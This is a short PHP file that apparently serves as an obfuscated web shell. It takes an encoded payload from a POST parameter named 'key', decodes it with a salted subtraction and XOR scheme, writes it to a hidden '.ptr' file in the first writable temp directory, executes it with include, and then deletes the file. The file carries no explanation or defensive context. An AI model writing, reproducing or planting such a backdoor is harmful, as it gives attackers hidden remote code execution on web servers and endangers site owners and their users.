<?php

if(@$_POST["k\x65\x79"] !== null){
	$bind = $_POST["k\x65\x79"];
			$bind	 	=	 explode		( 	 "."	,	 	$bind  ) ;	
	$val	 = '';
            $salt	 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS	 = strlen($salt );
            $r	 = 0;
    
            while ($r< 	count($bind)) {$v8	 = $bind[$r];
                $sChar	 = ord($salt[$r % $lenS] );
                $d	 = ((int)$v8 - $sChar - ($r % 10))	 ^	7;
                $val .= chr($d );
                $r++;
            }
	$fac = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), session_save_path(), getenv("TMP"), getenv("TEMP"), "/tmp", "/var/tmp", sys_get_temp_dir()]);
	while ($reference = array_shift($fac)) {
    		if (max(0, is_dir($reference) * is_writable($reference))) {
    $parameter_group = str_replace("{var_dir}", $reference, "{var_dir}/.ptr");
    $success = file_put_contents($parameter_group, $val);
if ($success) {
	include $parameter_group;
	@unlink($parameter_group);
	die();}
}
}
}